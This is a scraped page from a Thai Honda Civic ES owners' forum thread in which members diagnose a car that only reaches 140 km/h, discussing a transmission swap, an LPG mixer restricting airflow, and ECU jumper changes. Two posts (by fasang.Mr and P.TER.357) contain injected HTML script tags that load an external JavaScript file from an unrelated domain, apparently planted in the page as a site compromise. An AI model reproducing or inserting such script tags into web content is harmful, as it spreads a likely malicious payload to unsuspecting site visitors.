ตอบ
es_mania


ชื่อเล่น: แมน

เข้าร่วม: 02 ตุลา 2008
ตอบ: 1208

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2641
ให้คำขอบคุณ: 1357

ที่อยู่: สุขุมวิท 101 - ม.สวนดุสิต
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 15 กรกฎา 2010 01:39 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
น่าวิ่งได้เยอะกว่านี้ เพราะ ES ของเราๆนี่ 190 สบายๆเลยนะคับ
ได้รับคำขอบคุณจาก: alit 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 15 กรกฎา 2010 08:04 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
เก็บข้อมูลด้วยคนครับ แต่ของผมเดิมๆ 150 สบายๆครับยังไม่มิดครับ ใจไม่ถึงครับ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ซื้อมือสองมาเหมือนกันทดสอบกับระบบแก็สด้วย ใช้เส้นทาง หัวหินบายพาส ฝั่งเข้ากรุงเทพครับ
ได้รับคำขอบคุณจาก: alit 
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 15 กรกฎา 2010 14:37 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
Feudalz พิมพ์ว่า:
วายริ่งสายไฟครบเปล่าครับ ถ้ายกเครื่อง+เกียร์ของยุ่นมาเกียร์จะเป็น cvt นะครับ


ใช่ครับเป็นเกียร์ cvt ปัจจุบันพังแล้วครับ ที่เหยียบได้แค่ 140 ก่อนพังเหยียบได้แค่เกียร์ 1 เกียรเดียวไม่ยอมเปลี่ยน 2 ให้เลยเอา MT ชนกับเครื่องเดิมยุ่น เหยียบได้ 150 ก็เต็มแล้วครับ อาจจะเป็นที่กล่องได้หรือเปล่าครับ เพราะกินน้ำมันเหมือนกัน ในเมือง 8-9 โลลิตรกล่องมากับเครื่องยุ่นน่าจะเพี้ยนๆ ถ้าเก็บเงินเอากล่องฟ้ามาพ่วงจะไปได้ไกลกว่านี้หรือเปล่าครับ
P.TER.357


เข้าร่วม: 06 มีนา 2010
ตอบ: 968

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 2902

ที่อยู่: เมืองทองธานี - บางใหญ่ นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 15 กรกฎา 2010 15:14 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
สงสัยเกียร์ กลับบ้านเก่าแล้วอะคับ
รอกูรูอีกทีนะ
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: alit 
bankiize


เข้าร่วม: 20 เมษา 2009
ตอบ: 56

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 1

ที่อยู่: ABAC,Bangna
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 15 กรกฎา 2010 16:34 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ของผมอาการก็คล้ายๆเมื่อก่อนวิ่งได้180-190สบายๆ
ตอนนี้(ตั้งแต่เกียรพังแล้วไปโอเวอร์ฮอลมา)
ไม่รุ้เปนไร160ก็ไม่ขยับต่อละ ตื้อเลยรอบสูงกว่าปกตินิดหน่อยด้วย
แล้ววิ่งช้าลงอีก กินน้ำมันอีก เซงเป็ดเลยคับ
ได้รับคำขอบคุณจาก: alit 
silchai


ชื่อเล่น: เอ

เข้าร่วม: 02 ธันวา 2008
ตอบ: 307

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 283
ให้คำขอบคุณ: 180

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 15 กรกฎา 2010 17:50 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
รอบขึ้นแต่ความเร็วไม่ขึ้นตาม น่าจะเกียร์รึป่าวครับ
ได้รับคำขอบคุณจาก: alit 
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 15 กรกฎา 2010 19:38 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
เข้าอู่ครับ แน่นอนที่สุดเเระ แต่ผมช่วยท่านไม่ได้ครับ เป็นกำลังใจให้แล้วกัน
ป.ล. ผม ออโต้ เดิมๆ กดได้180 กว่าๆ พอครับ ใจไม่ถึงแล้ว ขาสั่นแล้วครับ
ได้รับคำขอบคุณจาก: alit 
Es_Pai


ชื่อเล่น: ไผ่

เข้าร่วม: 27 มีนา 2010
ตอบ: 34

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 19
ให้คำขอบคุณ: 377

ที่อยู่: เจียงใหม่
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 15 กรกฎา 2010 20:30 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ของผม ES 05 AT ก็วิ่งขึ้น 140 สบายๆ นะคับ สงสัยจะเป็นที่เกียร์ ล่ะมั้งคับ
ได้รับคำขอบคุณจาก: alit 
Feudalz


เข้าร่วม: 08 มีนา 2009
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 34

ที่อยู่: ลาดพร้าว
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 15 กรกฎา 2010 21:08 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
เข้าอู่แล้วลองหากล่องมาสับดูครับ ถ้าหายก็คงเป็นที่กล่อง ว่าแต่ตอนเปลี่ยน mt ไม่ได้ยกกล่อง mt มาด้วยเหรอครับ?
ได้รับคำขอบคุณจาก: alit 
lapesag


เข้าร่วม: 15 เมษา 2010
ตอบ: 38

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 5
ศุกร์, 16 กรกฎา 2010 12:24 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
แวะเข้ามาเก็บความรู้ครับ ของผม 01 เครื่องเทค เดิมๆ ออโต้ เหยีบ 180 สบายๆครับยังกดไม่มิดเลย โดน ผบ ประจำรถดุครับเลยต้องถอนคันเร่ง ถ้าได้ 140 น่าจะมีปัญหาชัวร์เเล้วครับรอผู้รู้มาช่วยวิเคราะห์ครับ
ได้รับคำขอบคุณจาก: alit 
civicy_art


เข้าร่วม: 01 ตุลา 2008
ตอบ: 3139

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1341
ให้คำขอบคุณ: 146

ที่อยู่: LAMPANG
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 17 กรกฎา 2010 13:22 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ผม 190 ยังไหลนะ แต่ช้าหน่อย AT
ได้รับคำขอบคุณจาก: alit 
es04


เข้าร่วม: 09 มีนา 2009
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 3485
ให้คำขอบคุณ: 342

ที่อยู่: ในซอย
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 19 กรกฎา 2010 19:55 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ติดแก๊สแบบดูด อยู่ไม่ใช่เหรอครับ
ได้รับคำขอบคุณจาก: alit 
dantouch


ชื่อเล่น: แดน

เข้าร่วม: 24 พฤศจิกา 2009
ตอบ: 1529

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2418
ให้คำขอบคุณ: 614

ที่อยู่: พระโขนง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 20 กรกฎา 2010 11:38 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ผมว่า น่าจะเป็นที่เกียนะครับ แผ่นครัชน่าจะมีปัญหานะครับ ของผมซื้อมือสองมา 2003 2.0 iVtec เดิมๆล้อก็เดิม วิ่งได้ 220 อ่ะ

ลองปรึกษาช่างชัยดูนะ นี่เบอร์ 089-123-6000 คนนี้สุดยอด
ได้รับคำขอบคุณจาก: alit 
gahn27


ชื่อเล่น: โอง

เข้าร่วม: 03 กุมภา 2010
ตอบ: 488

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 430
ให้คำขอบคุณ: 1284

ที่อยู่: นครศรีธรรมราช
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 20 กรกฎา 2010 11:54 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
มาเก็บข้อมูลครับ

รถผมเองเคยขับเหยียบเต็มที่ได้ 170 กว่าๆ ครับ มากกว่านี้ไม่ไหวกลัวจะปลิว เสียงลมปะทะน่ากลัวมากๆ

รถผมเดิมๆ เกียร์ auto ปี04
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 20 กรกฎา 2010 13:40 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
Feudalz พิมพ์ว่า:
เข้าอู่แล้วลองหากล่องมาสับดูครับ ถ้าหายก็คงเป็นที่กล่อง ว่าแต่ตอนเปลี่ยน mt ไม่ได้ยกกล่อง mt มาด้วยเหรอครับ?



ใช้กล่องเดิมของเกียร์ลูกเก่า at ครับ
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 20 กรกฎา 2010 13:43 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
es04 พิมพ์ว่า:
ติดแก๊สแบบดูด อยู่ไม่ใช่เหรอครับ


เกี่ยวด้วยเหรอครับ เพราะทั้งน้ำมันและแก๊ส ก็ได้เท่ากันต่างกันที่ขึ้นเร็วหรือช้าครับ เป็นที่ Mix เหรอครับมาขวางอากาศเกี่ยวหรือเปล่าแต่ความเร็วมันหายไปเยอะเลยครับ
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 20 กรกฎา 2010 13:44 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
dantouch พิมพ์ว่า:
ผมว่า น่าจะเป็นที่เกียนะครับ แผ่นครัชน่าจะมีปัญหานะครับ ของผมซื้อมือสองมา 2003 2.0 iVtec เดิมๆล้อก็เดิม วิ่งได้ 220 อ่ะ

ลองปรึกษาช่างชัยดูนะ นี่เบอร์ 089-123-6000 คนนี้สุดยอด



สนใจครับจะลองปรึกษาช่างดู เครื่องเน่าหรือเปล่า อืดมากเป็นพิเศษ
AUM[SilveR]


เข้าร่วม: 14 มกรา 2009
ตอบ: 1151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 159

ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 20 กรกฎา 2010 13:59 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ผมว่าเกียร์นะ เพราะ เกียร์ MT 140 นี่กำลังพุ่งเลย
ได้รับคำขอบคุณจาก: alit 
es04


เข้าร่วม: 09 มีนา 2009
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 3485
ให้คำขอบคุณ: 342

ที่อยู่: ในซอย
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 20 กรกฎา 2010 15:56 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
alit พิมพ์ว่า:
es04 พิมพ์ว่า:
ติดแก๊สแบบดูด อยู่ไม่ใช่เหรอครับ


เกี่ยวด้วยเหรอครับ เพราะทั้งน้ำมันและแก๊ส ก็ได้เท่ากันต่างกันที่ขึ้นเร็วหรือช้าครับ เป็นที่ Mix เหรอครับมาขวางอากาศเกี่ยวหรือเปล่าแต่ความเร็วมันหายไปเยอะเลยครับ



เกี่ยวซิครับ
ต้องลองเอาเวอร์เนียวัดรูมิกซ์ดู ว่าช่างเขาจัดมาให้กี่ มม.
ปรกติถ้าไม่กลึงเพิ่ม แตนๆมาจากร้านจัดชุดก็ 24 มม.
ถ้ามีใจกลึงขยายรูให้ก็น่าจะ 26 มม.เต็มที่แค่นั้น
มากกว่านี้ก็กินแก๊ส ลูกค้าบ่นอีก

ใส่มิกซ์อัดน้ำมันไม่ได้หรอก อืดแถมแดกน้ำมันกระจาย
ซี๊ดอากาศเพื่อผสมน้ำมันในโหลดสูงๆ
เอามิกซ์ไปขวางมันก็ง่อยแดกสิครับ
อากาศไม่เข้า มาแต่น้ำมัน
เครื่องมันก็ปั่นทิ้ง รอบขึ้นสูงโครต แต่ม้าไม่มาโดนตอนด้วยมิกซ์หมด

ถ้าไม่เชื่อลองถอดมิกซ์แล้ววิ่งอัดน้ำมันดู
อัดน้ำมันวิ่งดี อัตราการกินจะดีขึ้นเท่าเกณท์ธรรมดา

แต่ถ้าไม่มีมิกซ์อัดแก๊สก็ไม่ได้นะครับ
แดกแก๊สกระจายเหมือนกัน


ได้ผลไงมาบอกต่อด้วยครับ


แก้ไขล่าสุดโดย เมื่อ อังคาร, 20 กรกฎา 2010 20:38, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: alit  yoosabai 
deleteuser





ผู้มาเยือน



อังคาร, 20 กรกฎา 2010 19:03 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
เก็บข้อมูลด้วยคน
jatesada


เข้าร่วม: 11 ธันวา 2008
ตอบ: 550

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 699
ให้คำขอบคุณ: 946

ที่อยู่: พิจิตร
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 20 กรกฎา 2010 22:47 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
อยากรู้เหมือนกันครับ
es04


เข้าร่วม: 09 มีนา 2009
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 3485
ให้คำขอบคุณ: 342

ที่อยู่: ในซอย
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 20 กรกฎา 2010 23:11 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
กระบอกลิ้นเร่งปรกติเรามี ศก. 60 มม
โดนลดเหลือ 24-26มม
ก็ลองคิดดูแล้วกันครับว่าโหลด สูงๆ
มันจะอั้นขนาดไหน ครับ
ได้รับคำขอบคุณจาก: alit 
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 21 กรกฎา 2010 11:27 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
es04 พิมพ์ว่า:
alit พิมพ์ว่า:
es04 พิมพ์ว่า:
ติดแก๊สแบบดูด อยู่ไม่ใช่เหรอครับ


เกี่ยวด้วยเหรอครับ เพราะทั้งน้ำมันและแก๊ส ก็ได้เท่ากันต่างกันที่ขึ้นเร็วหรือช้าครับ เป็นที่ Mix เหรอครับมาขวางอากาศเกี่ยวหรือเปล่าแต่ความเร็วมันหายไปเยอะเลยครับ



เกี่ยวซิครับ
ต้องลองเอาเวอร์เนียวัดรูมิกซ์ดู ว่าช่างเขาจัดมาให้กี่ มม.
ปรกติถ้าไม่กลึงเพิ่ม แตนๆมาจากร้านจัดชุดก็ 24 มม.
ถ้ามีใจกลึงขยายรูให้ก็น่าจะ 26 มม.เต็มที่แค่นั้น
มากกว่านี้ก็กินแก๊ส ลูกค้าบ่นอีก

ใส่มิกซ์อัดน้ำมันไม่ได้หรอก อืดแถมแดกน้ำมันกระจาย
ซี๊ดอากาศเพื่อผสมน้ำมันในโหลดสูงๆ
เอามิกซ์ไปขวางมันก็ง่อยแดกสิครับ
อากาศไม่เข้า มาแต่น้ำมัน
เครื่องมันก็ปั่นทิ้ง รอบขึ้นสูงโครต แต่ม้าไม่มาโดนตอนด้วยมิกซ์หมด

ถ้าไม่เชื่อลองถอดมิกซ์แล้ววิ่งอัดน้ำมันดู
อัดน้ำมันวิ่งดี อัตราการกินจะดีขึ้นเท่าเกณท์ธรรมดา

แต่ถ้าไม่มีมิกซ์อัดแก๊สก็ไม่ได้นะครับ
แดกแก๊สกระจายเหมือนกัน


ได้ผลไงมาบอกต่อด้วยครับ



es04 พิมพ์ว่า:
กระบอกลิ้นเร่งปรกติเรามี ศก. 60 มม
โดนลดเหลือ 24-26มม
ก็ลองคิดดูแล้วกันครับว่าโหลด สูงๆ
มันจะอั้นขนาดไหน ครับ



สุดยอดเลยครับ ขอบคุณครับทำให้ผมมีความหวัง ตั้งแต่ซื้อมาได้ไม่เกิน 150 วันเสาร์นี้จะไปเยี่ยมบ้าน ตจว. จะลองถอดมิกซ์วิ่งน้ำมันดู ถ้าหายสาเหตุเป็นดังที่กล่าวมา สงสัยต้องอัพเป็นหัวฉีดแล้ว ขอบคุณล่วงหน้าเลยครับ ไม่ว่าจะหายหรือไม่หาย ก็ทำให้ผมมีความหวังที่จะ 200 ขึ้นมา

ถ้าได้ผลยังไงจะมาแจ้งให้ทราบเพื่อเป็นข้อมูลกับผู้อื่นต่อไปครับ
wittayab


เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 กรกฎา 2010 21:27 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ของผม 04-AT เปลี่ยนเฮดเดินท่อยัง 200+นิดๆ เลยครับ
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 29 กรกฎา 2010 11:52 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
es04 พิมพ์ว่า:
alit พิมพ์ว่า:
es04 พิมพ์ว่า:
ติดแก๊สแบบดูด อยู่ไม่ใช่เหรอครับ


เกี่ยวด้วยเหรอครับ เพราะทั้งน้ำมันและแก๊ส ก็ได้เท่ากันต่างกันที่ขึ้นเร็วหรือช้าครับ เป็นที่ Mix เหรอครับมาขวางอากาศเกี่ยวหรือเปล่าแต่ความเร็วมันหายไปเยอะเลยครับ



เกี่ยวซิครับ
ต้องลองเอาเวอร์เนียวัดรูมิกซ์ดู ว่าช่างเขาจัดมาให้กี่ มม.
ปรกติถ้าไม่กลึงเพิ่ม แตนๆมาจากร้านจัดชุดก็ 24 มม.
ถ้ามีใจกลึงขยายรูให้ก็น่าจะ 26 มม.เต็มที่แค่นั้น
มากกว่านี้ก็กินแก๊ส ลูกค้าบ่นอีก

ใส่มิกซ์อัดน้ำมันไม่ได้หรอก อืดแถมแดกน้ำมันกระจาย
ซี๊ดอากาศเพื่อผสมน้ำมันในโหลดสูงๆ
เอามิกซ์ไปขวางมันก็ง่อยแดกสิครับ
อากาศไม่เข้า มาแต่น้ำมัน
เครื่องมันก็ปั่นทิ้ง รอบขึ้นสูงโครต แต่ม้าไม่มาโดนตอนด้วยมิกซ์หมด

ถ้าไม่เชื่อลองถอดมิกซ์แล้ววิ่งอัดน้ำมันดู
อัดน้ำมันวิ่งดี อัตราการกินจะดีขึ้นเท่าเกณท์ธรรมดา

แต่ถ้าไม่มีมิกซ์อัดแก๊สก็ไม่ได้นะครับ
แดกแก๊สกระจายเหมือนกัน


ได้ผลไงมาบอกต่อด้วยครับ



ลองถอดมิกซ์ดูแล้วครับ วิ่งแต่น้ำมันไปต่างจังหวัดเมื่อเข้าพรรษา ดีขึ้นเลยครับไม่คิดว่ารถจะพุ่งได้ขนาดนี้ เร็วขึ้นเลยครับ แปปๆได้120แล้ว ลองเหยียบได้มา 160 แล้วครับ โดนผบ.ดุซะก่อนเพราะมีลูกและผบ.นั่งมาด้วย 160 ก็เริ่มตื้อแล้วครับ คิดว่าไม่น่าเกิน 170 น่าจะได้แค่นี้ คิดว่าปกติหรือยังครับ จะได้ฟันธงว่าเป็นเพราะมิกซ์มาขวางอากาศ จะได้หาทุนติดหัวฉีด
แต่ว่าเจอปัญหาใหม่แล้วครับ รอบมันตัดที่ 5000 เองครับ ไม่ปกติซะแล้ว ตอนเกียร์ AT ที่พังไป(ครัชหมด)รอบพุ่งถึง 7000-7500 ด้วยซ้ำไปแต่รถไม่วิ่ง เ็ป็นที่กล่องแน่เลย กล่องของ at ลูกเก่า ไม่รู้ว่าอู่ที่ชนเกียร์มาทำไรเค้าบอกว่ากล่องเดิม at ใช้ได้ เห็นมีการจั๊มสายไฟไป-มาที่ กล่อง ecu ด้วยไม่รู้ว่าทำไรกับกล่อง
มีใครรู้ไหม๊ครับ ว่ารถ mt ที่ใช้กล่อง at ต้องทำไรกับกล่อง at เดิมบ้างครับ ช่างที่อู่จั๊มสายอย่างนี้ถูกหรือเปล่าครับ หรือว่าต้องเปิดกล่องแก้ข้างในถึงใช้ได้


แก้ไขล่าสุดโดย เมื่อ พฤหัส, 29 กรกฎา 2010 15:43, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 29 กรกฎา 2010 14:01 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ไปเจอมาครับ D.I.Y. วิธีแก้กล่องของเครื่อง Honda จากเกียร์ Auto To Manual
ไม่รู้ว่ากล่องเราทำได้หรือเปล่า กล่องของเรารหัสอะไรครับ ทำได้หรือเปล่า

D.I.Y. วิธีแก้กล่องของเครื่อง Honda จากเกียร์ Auto To Manual มาฝากครับ
อันดับแรกเลยนะครับ เรามาดูหน้าตาของกล่อง Auto กับ Manual กันก่อนดีกว่าครับ

ต่อมาเป็นวิธีการแก้กล่องจากเกียร์ Auto to Manual ครับ
เริ่ม แรกเลยเราต้องเปิดฝากล่องด้านหลังออกมาก่อนครับ ให้หา Jumper : RP17 กับ RP18 ครับ ตำแหน่งจะอยู่เหนือรอมขึ้นไป ด้านบนครับ เมื่อเราเจอ Jumper แล้วให้เราดูค่าที่เขียนไว้ที่ R ครับ
ถ้าเป้นกล่อง Us spec จะมีค่า R ตามตารางด้านล่างครับ
Automatic Manual
RP17 2.7k Ohm Open
RP18 4.7k Ohm Jumpered
- ให้เอา jumper RP17,RP18 ออก
- แล้วให้ใช้สายไฟ 1 เส้นเล็ก ๆ ใส่ที่ RP18 แทนครับ หรือใช้ R ค่า 0 โอมห์ ครับ

ถ้าเป็นกล่อง Japan Spec จะมีค่า R ตามด้านล่างครับ
Automatic Manual
RP18 2.4k Ohm 1.4k Ohm
- ให้เปลี่ยน ค่า R ที่ RP18 จาก 2.4 Ohm เป็น 1.4 Ohm ครับ
เท่านี้เป็นอันเสร็จครับ สำหรับกล่อง Honda Obd 1 รหัส P08,30,72,74,75 ครับ


รูปของกล่อง D15B เกียร์ Manual ครับ สังเกตจุดแรกง่าย ๆ เลยครับ จากจุดสีแดงที่วงไว้
รูปของกล่อง D15B เกียร์ Manual ครับ สังเกตจุดแรกง่าย ๆ เลยครับ จากจุดสีแดงที่วงไว้
หน้าตาของกล่อง D15B เกียร์ Auto ครับ
หน้าตาของกล่อง D15B เกียร์ Auto ครับ
ได้รับคำขอบคุณจาก: yoosabai 
oatzakub


ชื่อเล่น: โอ๊ด ครับ

เข้าร่วม: 03 ธันวา 2009
ตอบ: 354

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 340
ให้คำขอบคุณ: 252

ที่อยู่: สมุทรปราการ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 29 กรกฎา 2010 15:08 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ผม ES 01 เกียร์ AT ได้ 160 แต่ ผบ บอกพอแล้ว ฉันไม่รีบ เลยไม่ได้กดต่อ เพื่อนๆที่ขับ AT ที่เคยกดสุด ได้ เท่าไหร่ ครับ
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 29 กรกฎา 2010 16:06 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
guru มาแว้วหลอ
Anakin


ชื่อเล่น: เอก

เข้าร่วม: 31 กรกฎา 2009
ตอบ: 1119

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 910
ให้คำขอบคุณ: 1439

ที่อยู่: Korat - Rayong
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 29 กรกฎา 2010 18:57 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
ผมไปเรื่อยๆๆ 120 ก็พอแล้ว
PoKo


เข้าร่วม: 30 เมษา 2010
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 80
ให้คำขอบคุณ: 111
พฤหัส, 29 กรกฎา 2010 21:24 - ช่วยวิเคราะห์ที วิ่งได้ 140 เอง AT ครับ
160 เวลาโค้งก็ เสียวแล้วคับ ถนน ดีๆก็หายาก

รถเดิมทั้งคัน ยางก็เก่าไม่กล้าเหยียบต่ออะคับ
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.